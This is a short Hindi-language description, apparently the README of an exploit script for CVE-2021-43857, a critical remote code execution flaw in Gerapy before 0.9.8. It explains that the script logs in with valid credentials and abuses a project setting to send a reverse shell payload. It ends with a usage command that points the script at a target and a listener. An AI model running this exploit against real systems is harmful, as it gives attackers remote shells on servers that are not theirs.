
Gerapy संस्करण 0.9.8 से पहले रिमोट कोड निष्पादन के लिए संवेदनशील है। यह समस्या संस्करण 0.9.8 में पैच की गई है।
Gerapy संस्करण 0.9.8 से पहले के संस्करण रिमोट कोड निष्पादन के प्रति संवेदनशील है। यह समस्या संस्करण 0.9.8 में ठीक कर दी गई है।
CVE-2021-43857 एक भेद्यता है जिसे क्रिटिकल प्राथमिकता (CVSS 9.8) के रूप में चिह्नित किया गया है, जो रिमोट कोड निष्पादन की ओर ले जाती है।
यह भेद्यता 0.9.8 से पहले के सभी संस्करणों पर काम करती है।
केवल 0.9.6 पर परीक्षण किया गया है। सही क्रेडेंशियल की आवश्यकता है।
एक्सप्लॉइट एप्लिकेशन में लॉग इन करके काम करता है, फिर बनाए गए प्रोजेक्ट्स की सूची प्राप्त करता है (यदि कोई नहीं है तो यह विफल हो जाएगा), फिर रिवर्स शेल पेलोड भेजकर संवेदनशील spider तंत्र को चलाने के लिए प्रोजेक्ट सेटिंग का उपयोग करता है।
उपयोग उदाहरण:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
